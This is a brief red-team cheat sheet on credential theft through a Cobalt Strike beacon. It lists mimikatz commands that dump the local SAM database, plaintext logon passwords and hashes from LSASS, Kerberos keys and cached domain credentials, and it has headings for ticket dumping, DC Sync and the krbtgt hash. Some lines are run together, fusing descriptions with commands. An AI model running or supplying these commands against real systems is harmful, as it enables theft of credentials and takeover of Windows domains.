Credential Theft
Credential Theft
"!" symbol is used to run command in elevated context of System User
"@" symbol is used to impersonate beacon thread token
Dump the local SAM database
beacon> mimikatz !lsadump::samDump the logon passwords (Plain Text + Hashes) from LSASS.exe for currently logged on users
beacon> mimikatz !sekurlsa::logonpasswordsDump the encryption keys used by Kerberos of logged on users (hashes incorrectly labelled as des_cbc_md4)
beacon> mimikatz !sekurlsa::ekeysDump Domain Cached Credentials (cannotbe be used for lateral movement unless cracked)
beacon> mimikatz !lsadump::cacheList the kerberos tickets cached in current logon session or all logon session (privileged session)
Dump the TGT Ticket from given Logon Session (LUID)
DC Sync
Dump krbtgt hash from DC (locally)
Last updated